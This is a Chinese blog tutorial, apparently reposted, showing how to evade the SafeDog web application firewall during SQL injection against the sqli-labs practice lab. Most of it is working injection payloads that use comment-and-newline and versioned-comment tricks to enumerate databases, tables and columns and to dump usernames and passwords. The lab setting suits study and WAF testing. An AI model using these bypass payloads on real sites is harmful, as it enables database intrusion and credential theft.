Bypass安全狗

2024-02-23 04:58
文章标签 安全 bypass

本文主要是介绍Bypass安全狗,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

0x00 手工fuzz绕过安全狗

环境

安全狗最新ApacheV4.0版(Windows)
在这里插入图片描述
Sqli-lab-Less-1

Phpstudy集成环境:Apache2.4.39、Mysql5.5.29

在这里插入图片描述

Sqli-lab-Less-1中包含了联合查询、报错注入、布尔盲注、时间延时盲注等注入姿势,方便我们进行测试。

1、fuzz安全狗拦截策略

http://192.168.174.136/sqli-labs-master/sqli-labs-master/Less-1/?id=1'   报错且不拦截
http://192.168.174.136/sqli-labs-master/sqli--master/Less-1/?id=1' and '1'='1 --+   拦截
http://192.168.174.136/sqli-labs-master/sqli-labs-master/Less-1/?id=1' and  不拦截,所以判断and后接数字则触发规则

在这里插入图片描述
在这里插入图片描述

通过burp加载字典对其进行fuzz,发现/*/%0a*a*/未触发规则
该处采用换行加注释进行绕过,其中/**/为mysql注释符,将中间内容注释不执行

在这里插入图片描述
通过and ’1‘=‘1判断页面返回正常,并未触发安全狗
在这里插入图片描述
通过and ’1‘=‘2判断页面返回不同,确定为字符型注入
在这里插入图片描述

2、查询字段数

1'order/*/%0a*a*/by 3%23  不报错
1'order/*/%0a*a*/by 4%23  报错则判断当前字段为3

正常payload被拦截

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ovvCaGZA-1631090852631)(编写tamper学习-过狗.assets/image-20210908095928241.png)]

使用上面payload即可绕过

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Z31WKrmP-1631090852632)(编写tamper学习-过狗.assets/image-20210908095758501.png)]

3、联合查询

使用上面payload发现被安全狗拦截

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KQUGFm6X-1631090852633)(编写tamper学习-过狗.assets/image-20210908100226083.png)]

多次尝试发现在其再次加入注释即可绕过

此处使用/*!88888www.safedog.dog*/即可绕过,在mysql中存在特性,/*!*/中的数字大于当前数据库版本号则不执行,反之则执行,这个特性常常用于过waf,另外注释中的数字常常为五位数。
最终payload为 :
-1'union/*/%0a*a*//*!88888www.safedog.dog*/ select 1,2,3/**/%23
显示位为Your Login name和Your Password

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-JtcE83yt-1631090852634)(编写tamper学习-过狗.assets/image-20210908101619776.png)]

4、查询当前库名

先利用以上payload进行测试

-1'union/*/%0a*a*//*!88888www.safedog.dog*/ select 1,2,database()/**/%23

多次测试发现拦截字段database()

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-oyngfEfW-1631090852635)(编写tamper学习-过狗.assets/image-20210908110617644.png)]

在database和()中间加入之前payload即可绕过

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-lQMoM5Rx-1631090852636)(编写tamper学习-过狗.assets/image-20210908144633628.png)]

最终的payload为

-1'union/*/%0a*a*//*!88888www.safedog.dog*/ select 1,2,database/*/%0a*a*/()%23

5、查询所有数据库名称

同样利用以上payload尝试发现安全狗对from和information_schema.schemata进行拦截,再次通过字典对其fuzz,首先对from进行fuzz,使其不触发规则即可

 from可以使用注释加换行可以绕过/*! --+/*123%0a%0a from对于information_schema.schemata,将其字段通过内联注释混淆即可最终语句为
-1' union/*/%0a*a*//*!88888www.safedog.dog*/select/**/1,2,(select/**//*!88888www.safedog.dog*/group_concat(schema_name) from/*!--+/*%0a information_schema./*!schemata*/)%23

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MW65sh8v-1631090852637)(编写tamper学习-过狗.assets/image-20210908105314773.png)]

通过fuzz方式发现下列语句也可绕过

-1' union/*//--/*//*!--+/*%0aselect/*//--/*//*!--+/*%0a1,2,(select/*//--/*//*!--+/*%0agroup_concat(schema_name) from/*//--/*//*!--+/*%0a information_schema./*!schemata*/)%23
主要绕过字段为/*//--/*//*!--+/*%0a

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yjmd8yjo-1631090852638)(编写tamper学习-过狗.assets/image-20210908110402546.png)]

6、获取表名

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-kqJmeG4y-1631090852639)(编写tamper学习-过狗.assets/image-20210908154221936.png)]

http://192.168.174.136/sqli-labs-master/sqli-labs-master/Less-1/?id=-1%27%20union/*/%0a*a*//*!88888www.safedog.dog*/%20select%201,2,(select%20group_concat(table_name)%20/*!%20--+/*123%0a%0afrom%20information_schema./*!tables*/ where table_schema='security')%23

7、获取字段名

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-A5zAiVSr-1631090852641)(编写tamper学习-过狗.assets/image-20210908155127598.png)]

    http://192.168.174.136/sqli-labs-master/sqli-labs-master/Less-1/?id=-1' union /*/%0a*a*//*!88888www.safedog.dog*/select /*/%0a*a*//*!88888www.safedog.dog*/1,2,group_concat(column_name)    from /*!--+/*%0ainformation_schema./*!columns*/ where table_name='users' --+

8、获取数据

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xi3YLDYD-1631090852644)(编写tamper学习-过狗.assets/image-20210908160357758.png)]

http://192.168.174.136/sqli-labs-master/sqli-labs-master/Less-1/?id=-1' union /*/%0a*a*//*!88888www.safedog.dog*/ select 1,2, group_concat(concat_ws(0x7e,username, password))    from   security.users --+

参考文章:https://blog.csdn.net/weixin_54648419/article/details/117285917

这篇关于Bypass安全狗的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/737587

相关文章

浅析Rust多线程中如何安全的使用变量

《浅析Rust多线程中如何安全的使用变量》这篇文章主要为大家详细介绍了Rust如何在线程的闭包中安全的使用变量,包括共享变量和修改变量,文中的示例代码讲解详细,有需要的小伙伴可以参考下... 目录1. 向线程传递变量2. 多线程共享变量引用3. 多线程中修改变量4. 总结在Rust语言中,一个既引人入胜又可

客户案例:安全海外中继助力知名家电企业化解海外通邮困境

1、客户背景 广东格兰仕集团有限公司(以下简称“格兰仕”),成立于1978年,是中国家电行业的领军企业之一。作为全球最大的微波炉生产基地,格兰仕拥有多项国际领先的家电制造技术,连续多年位列中国家电出口前列。格兰仕不仅注重业务的全球拓展,更重视业务流程的高效与顺畅,以确保在国际舞台上的竞争力。 2、需求痛点 随着格兰仕全球化战略的深入实施,其海外业务快速增长,电子邮件成为了关键的沟通工具。

安全管理体系化的智慧油站开源了。

AI视频监控平台简介 AI视频监控平台是一款功能强大且简单易用的实时算法视频监控系统。它的愿景是最底层打通各大芯片厂商相互间的壁垒,省去繁琐重复的适配流程,实现芯片、算法、应用的全流程组合,从而大大减少企业级应用约95%的开发成本。用户只需在界面上进行简单的操作,就可以实现全视频的接入及布控。摄像头管理模块用于多种终端设备、智能设备的接入及管理。平台支持包括摄像头等终端感知设备接入,为整个平台提

2024网安周今日开幕,亚信安全亮相30城

2024年国家网络安全宣传周今天在广州拉开帷幕。今年网安周继续以“网络安全为人民,网络安全靠人民”为主题。2024年国家网络安全宣传周涵盖了1场开幕式、1场高峰论坛、5个重要活动、15场分论坛/座谈会/闭门会、6个主题日活动和网络安全“六进”活动。亚信安全出席2024年国家网络安全宣传周开幕式和主论坛,并将通过线下宣讲、创意科普、成果展示等多种形式,让广大民众看得懂、记得住安全知识,同时还

【Kubernetes】K8s 的安全框架和用户认证

K8s 的安全框架和用户认证 1.Kubernetes 的安全框架1.1 认证:Authentication1.2 鉴权:Authorization1.3 准入控制:Admission Control 2.Kubernetes 的用户认证2.1 Kubernetes 的用户认证方式2.2 配置 Kubernetes 集群使用密码认证 Kubernetes 作为一个分布式的虚拟

企业安全之WiFi篇

很多的公司都没有安全团队,只有运维来负责整个公司的安全,从而安全问题也大打折扣。我最近一直在给各个公司做安全检测,就把自己的心得写下来,有什么不足之处还望补充。 0×01  无线安全 很多的公司都有不怎么注重公司的无线电安全,有钱的公司买设备,没钱的公司搞人力。但是人的技术在好,没有设备的辅助,人力在牛逼也没有个卵用。一个好的路由器、交换机、IDS就像你装备了 无尽、狂徒、杀人书一

Linux 安全弹出外接磁盘

命令行操作 首先,需要卸载硬盘上的所有分区,可以使用umount来卸载分区 清空系统缓存,将所有的数据写入磁盘 sync 列出已挂载的文件系统 使用lsblk或者df命令来查找要卸载的分区 lsblk or df -h 确保没有文件正在使用 使用lsof 命令来检查 sudo lsof |grep /dev/sdc 卸载分区 假设硬盘的分区是 /dev/sdc1,使用u

3.比 HTTP 更安全的 HTTPS(工作原理理解、非对称加密理解、证书理解)

所谓的协议 协议只是一种规则,你不按规则来就无法和目标方进行你的工作 协议说白了只是人定的规则,任何人都可以定协议 我们不需要太了解细节,这些制定和完善协议的人去做的,我们只需要知道协议的一个大概 HTTPS 协议 1、概述 HTTPS(Hypertext Transfer Protocol Secure)是一种安全的超文本传输协议,主要用于在客户端和服务器之间安全地传输数据

【小迪安全笔记 V2022 】信息打点9~11

第9天 信息打点-CDN绕过篇&漏洞回链8接口探针&全网扫指&反向件 知识点: 0、CDN知识-工作原理及阻碍 1、CDN配置-域名&区域&类型 2、CDN绕过-靠谱十余种技战法 3、CDN绑定-HOSTS绑定指向访问 CDN 是构建在数据网络上的一种分布式的内容分发网。 CDN的作用是采用流媒体服务器集群技术,克服单机系统输出带宽及并发能力不足的缺点,可极大提升系统支持的并发流数目,减少或避

OpenStack中加固VNC访问安全

OpenStack中加固VNC访问安全 目录 OpenStack中加固VNC访问安全1.问题发现2.流程分析3.潜在后果4.解决方案④配置IPtables⑤VNC添加访问密码 5.参考链接 1.问题发现 很多同学使用noVNC之后都没有退出终端的习惯,往往都是用完了就直接关闭网页窗口。说这样隐患很大,如果内网里面有一些script kiddie随时都能将我们线上的虚拟